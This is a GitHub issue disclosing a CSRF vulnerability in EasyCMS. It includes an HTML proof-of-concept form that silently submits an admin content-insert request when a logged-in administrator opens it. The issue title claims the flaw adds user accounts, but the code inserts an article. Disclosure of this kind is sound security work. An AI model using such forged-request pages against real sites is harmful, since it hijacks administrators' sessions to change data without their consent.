Skip to content
This repository has been archived by the owner on Dec 26, 2019. It is now read-only.

There is one CSRF vulnerability that can add the user account #8

Closed
RitaWWang opened this issue Jan 15, 2019 · 0 comments
Closed

There is one CSRF vulnerability that can add the user account #8

RitaWWang opened this issue Jan 15, 2019 · 0 comments

Comments

@RitaWWang
Copy link

RitaWWang commented Jan 15, 2019

After the administrator logged in, open the following page
poc:
one.html---add a user

  <!-- CSRF PoC -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/EasyCMS-master/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent" method="POST">
      <input type="hidden" name="tid" value="62" />
      <input type="hidden" name="title" value="test1" />
      <input type="hidden" name="keyword" value="11" />
      <input type="hidden" name="ispush" value="0" />
      <input type="hidden" name="iscommend" value="1" />
      <input type="hidden" name="isslides" value="0" />
      <input type="hidden" name="islock" value="0" />
      <input type="hidden" name="summary" value="test" />
      <input type="hidden" name="content" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>```
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants